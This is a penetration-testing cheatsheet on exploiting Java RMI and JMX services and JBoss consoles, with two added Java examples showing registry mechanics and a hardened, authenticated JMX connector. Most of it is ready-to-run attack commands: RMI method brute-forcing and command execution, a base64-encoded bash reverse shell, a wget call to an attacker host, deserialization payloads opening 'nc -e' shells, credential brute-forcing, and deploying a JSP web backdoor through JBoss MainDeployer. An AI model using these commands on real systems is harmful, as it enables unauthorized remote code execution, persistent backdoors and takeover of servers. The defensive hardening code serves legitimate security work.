RMI can run on any nonstandard port, and when an RMI registry is running you will observe one more endpoint port associated with it (the listening port of the exported object). You can find it easily with nmap's rmi-dumpregistry script.
Java Management Extensions (JMX) and Remote Method Invocation (RMI) play crucial roles in the management and monitoring of Java applications. They allow developers and administrators to interact with applications remotely, providing a powerful interface for managing resources. However, this also opens up potential vulnerabilities that can be exploited if not properly secured. This cheatsheet is designed for penetration testers and security professionals looking to understand and exploit weaknesses in Java JMX RMI implementations effectively.
# The jmxrmi bound name and its signatures might be vulnerable to the MLet MBean issue: MLet is an MBean that can be used for loading additional MBeans over the network.
java.lang.String getVersion()
javax.management.remote.rmi.RMIConnection newClient(java.lang.Object arg)
Java RMI Registry - Port 1616
nmap -Pn -sS -sV --script "rmi-dumpregistry or rmi-vuln-classloader" -p 1616
What is Java RMI?
The Java Remote Method Invocation (RMI) system allows an object running in one Java virtual machine to invoke methods on an object running in another Java virtual machine. RMI provides for remote communication between programs written in the Java programming language. When developers want to make their Java objects available within the network, they usually bind them to an RMI registry. The registry stores all information required to connect to the object (IP address, listening port, implemented class or interface and the ObjID value) and makes it available under a human-readable name (the bound name). Clients that want to consume the RMI service ask the RMI registry for the corresponding bound name and the registry returns all required information to connect. Thus, the situation is basically the same as with an ordinary DNS service.
What is Apache Tomcat?
Apache Tomcat is a free and open-source implementation of the Jakarta Servlet, Jakarta Expression Language, and WebSocket technologies. It provides a "pure Java" HTTP web server environment in which Java code can run.
What is JBoss application server?
JBoss application server is an open-source platform, developed by Red Hat, used for implementing Java applications and a wide variety of other software applications. You can build and deploy Java services to be scaled to fit the size of your business.
What is JMX?
Java Management Extensions (JMX) is a Java technology that supplies tools for managing and monitoring applications, system objects, devices (such as printers) and service-oriented networks. Those resources are represented by objects called MBeans (for Managed Bean). Using the JMX console, we can manage the application and, therefore, alter it to execute malicious code on the target server and gain remote code execution.
What is an MBean?
An MBean is a managed Java object, similar to a JavaBeans component, that follows the design patterns set forth in the JMX specification. An MBean can represent a device, an application, or any resource that needs to be managed.
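The registry mechanics described under "What is Java RMI?" above, as an added example (not code from the original post): a minimal service bound to a registry on the nonstandard port 1616 used elsewhere on this page, and a client that lists the bound names, resolves one, and invokes it. The interface name `Greeter`, the bound name `greeter` and the port are assumptions chosen for the demo. Run it with `java RmiRegistryDemo.java` on JDK 11 or newer.

```java
import java.rmi.Remote;
import java.rmi.RemoteException;
import java.rmi.registry.LocateRegistry;
import java.rmi.registry.Registry;
import java.rmi.server.UnicastRemoteObject;

/*
 * Added example (not from the original post): one JVM plays both server and
 * client so the registry's role as a directory is visible end to end.
 * Greeter, the bound name "greeter" and port 1616 are demo assumptions.
 */
public class RmiRegistryDemo {

    // The remote interface: every exported method must declare RemoteException.
    public interface Greeter extends Remote {
        String greet(String name) throws RemoteException;
    }

    // Server-side implementation. Exporting it opens the second, dynamically
    // chosen listening port that the registry entry points at.
    public static class GreeterImpl implements Greeter {
        @Override
        public String greet(String name) throws RemoteException {
            return "Hello, " + name;
        }
    }

    public static void main(String[] args) throws Exception {
        int registryPort = 1616;

        // --- server side ---
        // Start a registry in this JVM on a nonstandard port.
        Registry registry = LocateRegistry.createRegistry(registryPort);

        // Export the object (port 0 = let RMI pick an ephemeral port) and get its stub.
        GreeterImpl impl = new GreeterImpl();
        Greeter stub = (Greeter) UnicastRemoteObject.exportObject(impl, 0);

        // Bind the stub under a human-readable name: this is the "bound name".
        registry.bind("greeter", stub);

        // --- client side ---
        // Step 1: ask the registry which names it knows (what rmi-dumpregistry does).
        Registry remote = LocateRegistry.getRegistry("127.0.0.1", registryPort);
        for (String name : remote.list()) {
            System.out.println("bound name: " + name);
        }

        // Step 2: resolve the name. The stub that comes back embeds host, port and
        // ObjID of the exported object; the registry itself is only a directory.
        Greeter client = (Greeter) remote.lookup("greeter");
        System.out.println("stub: " + client); // shows endpoint:[host:port] and objID

        // Step 3: the actual call goes straight to the exported object's own port.
        System.out.println(client.greet("operator"));

        // Clean up so the JVM can exit.
        registry.unbind("greeter");
        UnicastRemoteObject.unexportObject(impl, true);
        UnicastRemoteObject.unexportObject(registry, true);
    }
}
```

The printed stub shows what the registry actually hands out: the endpoint (host plus the exported object's own listening port) and the ObjID. That second port is the "one more endpoint port" noted at the top of the page; it is chosen at random unless `exportObject` is given a fixed port, which is why an inventory of exposed RMI services has to enumerate the registry's entries rather than stop at the registry port.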
BaRMIe
# Download the package from releases: https://github.com/NickstaDB/BaRMIe/releases/tag/v1.01
java -jar BaRMIe.jar -enum 192.168.1.11 5000
java -jar BaRMIe.jar -attack 192.168.1.11 5000
Remote Method Guesser
https://github.com/qtc-de/remote-method-guesser
java -jar rmg-3.0.0-jar-with-dependencies.jar 10.10.10.10 5000 enum

# Look for vulnerabilities
java -jar rmg.jar enum 10.10.10.10 5000

# Get bound names / brute-force the available method signatures
java -jar rmg.jar guess 10.10.10.10 1099
Output: CustomRMIServer ] HIT! Method with signature String runCommand(Strin

# Exploiting the available method
java -jar rmg.jar call domain-test.com 1099 --bound-name CustomRMIServer 'new String[] {"ls", "-al"}' --signature 'String runCommand(String[] args)'
# By default, Remote Method Guesser does not display the function/command output; we need to use remote plugins to get the output
# Function name / bound name = CustomRMIServer, followed by the signature found by guess
# Let's use the time command and sleep to find out whether we are able to execute commands or not
time java -jar rmg.jar call domain-test.com 1099 --bound-name CustomRMIServer 'new String[] {"sleep", "5"}' --signature 'String runCommand(String[] args)'

# If the sleep is successful, then it's time for command execution using the RMG plugin GenericPrint.jar
java -jar rmg.jar call domain-test.com 1099 --bound-name CustomRMIServer 'new String[] {"ls", "-al"}' --signature 'String runCommand(String[] args)' --plugin plugins/GenericPrint.jar

# Gaining a reverse shell
echo '/bin/bash -c "bash -i >& /dev/tcp/10.10.10.1/443 0>&1"' | base64 -w0;echo
java -jar rmg.jar call domain-test.com 1099 'new String[] {"/bin/bash", "-c", "echo L2Jpbi9iYXNoIC1jICJiYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjEwLjEvNDQzIDA+JjEiCg==| base64 -d | bash"}' --signature 'String runCommand(String[] args)' --bound-name CustomRMIServer --plugin plugins/GenericPrint.jar

# Command exec - example
java -jar rmg.jar call 10.10.10.10 5000 "wget Attacker_IP:8000/worked" --signature 'String execute(String cmd)' --bound-name jmxrmi

# Exploit CVE-2019-2684; try to bind a client locally; doesn't work for JMX RMI
java -jar rmg.jar bind 10.10.10.10 5000 10.11.11.11:8080 my-object --localhost-bypass
Beanshooter
# Good for JMX servers. Source: https://github.com/qtc-de/beanshooter#Serial
# Download the package from the repo: https://github.com/qtc-de/beanshooter/releases

# Check for auth and possible attributes
# If auth is enabled, you cannot go further.
java -jar beanshooter.jar info 10.10.10.10 5000

# Enum - check for vulns (auth and pre-auth deserialization)
java -jar beanshooter.jar enum 10.10.10.10 5000

# Brute-force creds
java -jar beanshooter.jar brute 10.10.10.10 5000 --username-file /usr/share/wordlists/user.txt --password-file /usr/share/wordlists/pass.txt

# You might require ysoserial.jar; download and copy it to /opt/yso.jar or add the arg "--yso /opt/yso.jar"
# Get a REVERSE SHELL
java -jar beanshooter.jar serial 10.10.10.10 5000 CommonsCollections6 "nc 10.11.11.11 443 -e ash" --username admin --password admin

# Add --preauth if pre-auth deserialization is enabled
java -jar beanshooter.jar serial 10.10.10.10 5000 --preauth CommonsCollections6 "nc 10.11.11.11 443 -e ash"

# If SSL is enabled
java -jar beanshooter.jar enum --ssl 10.10.10.10 5000

# If the remote MBean server does not require auth:
# this might require tonka; you can find it in the beanshooter repo: https://github.com/qtc-de/beanshooter#deploy
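The auth and SSL checks above (beanshooter's info and enum) flag the two settings that decide whether a JMX endpoint is reachable by an anonymous client. As an added example (not code from the original post or from the beanshooter project), this is the hardened side in code: a standard MBean as described under "What is an MBean?", exposed through an RMI connector server that pins the connector to the same port as the registry and requires credentials via a JMXAuthenticator; the program then verifies its own configuration by attempting an anonymous connection (expected to be rejected) followed by an authenticated one. The MBean name, the credentials and port 1616 are assumptions for the demo. Run it with `java HardenedJmxDemo.java` on JDK 11 or newer.

```java
import java.lang.management.ManagementFactory;
import java.nio.charset.StandardCharsets;
import java.rmi.registry.LocateRegistry;
import java.rmi.registry.Registry;
import java.rmi.server.UnicastRemoteObject;
import java.security.MessageDigest;
import java.util.Collections;
import java.util.HashMap;
import java.util.Map;
import javax.management.MBeanServer;
import javax.management.MBeanServerConnection;
import javax.management.ObjectName;
import javax.management.remote.JMXAuthenticator;
import javax.management.remote.JMXConnector;
import javax.management.remote.JMXConnectorFactory;
import javax.management.remote.JMXConnectorServer;
import javax.management.remote.JMXConnectorServerFactory;
import javax.management.remote.JMXPrincipal;
import javax.management.remote.JMXServiceURL;
import javax.security.auth.Subject;

/*
 * Added example, not code from the original post or from beanshooter.
 * A JMX-over-RMI endpoint that requires credentials, followed by a self-check.
 * Port 1616, the MBean name and the credentials are demo assumptions.
 */
public class HardenedJmxDemo {

    // Standard MBean: the management interface must be named <ImplClass>MBean.
    public interface AppStatusMBean {
        int getActiveSessions();
    }

    public static class AppStatus implements AppStatusMBean {
        @Override
        public int getActiveSessions() { return 42; } // constructed sample value
    }

    // The RMI connector hands the authenticator the client's credentials as
    // String[]{user, password}; anything else (including null from an anonymous
    // client) is rejected with a SecurityException, which the client receives.
    static JMXAuthenticator authenticator(String user, String pass) {
        byte[] u = user.getBytes(StandardCharsets.UTF_8);
        byte[] p = pass.getBytes(StandardCharsets.UTF_8);
        return credentials -> {
            if (!(credentials instanceof String[]) || ((String[]) credentials).length != 2) {
                throw new SecurityException("credentials required: {user, password}");
            }
            String[] c = (String[]) credentials;
            if (c[0] == null || c[1] == null) {
                throw new SecurityException("credentials required: {user, password}");
            }
            // Constant-time comparison of both fields so timing does not reveal which one was wrong.
            boolean userOk = MessageDigest.isEqual(c[0].getBytes(StandardCharsets.UTF_8), u);
            boolean passOk = MessageDigest.isEqual(c[1].getBytes(StandardCharsets.UTF_8), p);
            if (!userOk || !passOk) {
                throw new SecurityException("authentication failed");
            }
            return new Subject(true, Collections.singleton(new JMXPrincipal(c[0])),
                    Collections.emptySet(), Collections.emptySet());
        };
    }

    public static void main(String[] args) throws Exception {
        int port = 1616;
        String host = "127.0.0.1";

        MBeanServer mbs = ManagementFactory.getPlatformMBeanServer();
        ObjectName name = new ObjectName("demo:type=AppStatus");
        mbs.registerMBean(new AppStatus(), name);

        // Registry and connector share one fixed port instead of the connector
        // landing on a random second port, which keeps firewall rules meaningful.
        Registry registry = LocateRegistry.createRegistry(port);
        JMXServiceURL url = new JMXServiceURL(
                "service:jmx:rmi://" + host + ":" + port + "/jndi/rmi://" + host + ":" + port + "/jmxrmi");

        Map<String, Object> env = new HashMap<>();
        env.put(JMXConnectorServer.AUTHENTICATOR, authenticator("admin", "change-me-before-deploy"));
        // TLS for the connector (needs a keystore via -Djavax.net.ssl.keyStore / keyStorePassword):
        // env.put("jmx.remote.rmi.server.socket.factory", new javax.rmi.ssl.SslRMIServerSocketFactory(null, null, true));
        // env.put("jmx.remote.rmi.client.socket.factory", new javax.rmi.ssl.SslRMIClientSocketFactory());

        JMXConnectorServer server = JMXConnectorServerFactory.newJMXConnectorServer(url, env, mbs);
        server.start();
        System.out.println("JMX connector up at " + server.getAddress());

        // Self-check 1: an anonymous client (what an enum probe looks like) must be refused.
        try {
            JMXConnectorFactory.connect(server.getAddress()).close();
            System.out.println("FAIL: anonymous connection accepted");
        } catch (SecurityException e) {
            System.out.println("OK: anonymous connection rejected (" + e.getMessage() + ")");
        }

        // Self-check 2: a client presenting the credentials can read the MBean attribute.
        Map<String, Object> clientEnv = new HashMap<>();
        clientEnv.put(JMXConnector.CREDENTIALS, new String[] {"admin", "change-me-before-deploy"});
        try (JMXConnector c = JMXConnectorFactory.connect(server.getAddress(), clientEnv)) {
            MBeanServerConnection conn = c.getMBeanServerConnection();
            System.out.println("OK: ActiveSessions = " + conn.getAttribute(name, "ActiveSessions"));
        }

        server.stop();
        UnicastRemoteObject.unexportObject(registry, true); // let the JVM exit
    }
}
```

The same two settings apply to the JDK's built-in agent: `-Dcom.sun.management.jmxremote.authenticate=true` (with the password and access files) and `-Dcom.sun.management.jmxremote.ssl=true`. One caveat: the commented-out socket-factory lines protect only the connector; the registry lookup that returns the connector stub still happens in the clear unless the registry itself is created with the SSL socket factories, which is what the built-in agent's `com.sun.management.jmxremote.registry.ssl=true` does.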
RMIScout
# Download the package: https://github.com/BishopFox/rmiscout/releases
git clone https://github.com/BishopFox/rmiscout.git

# Brute-force
java -jar rmiscout.jar bruteforce -i lists/methods.txt -r void,boolean,long -p String,int -l 1,4 <host> <port>

# Wordlist (rmiscout.sh is the project's wrapper script, not a jar)
./rmiscout.sh wordlist -i lists/prototypes.txt <host> <port>
Attacking JBOSS JMX Management
The default username/password is admin:admin.
 - Under the 'JMX Agent View' page, you can search for any JBoss API: search for 'jboss.system*' to find the MainDeployer (JBoss System API).
 - The MainDeployer service can be used to manage deployments on the JBoss application server.
 - Scroll down to the redeploy attribute. Make sure the redeploy attribute accepts a URL as the input (java.net.URL).
 - Use the backdoor JSP payload from https://github.com/fuzzdb-project/fuzzdb/blob/master/web-backdoors/jsp/cmd.jsp
 - Create a war file using `jar -cvf cmd.war cmd.jsp`
 - Serve it from a Python HTTP server and make sure it's accessible from the JBoss server; we can invoke a war file from a URL and install it.
 - Under MainDeployer, head over to the JMX Console page and, under the redeploy attribute --> java.net.URL, paste the cmd.war file URL and hit "Deploy".
 - Now head over to 'http://domain.com/cmd/cmd.jsp' for GET command execution.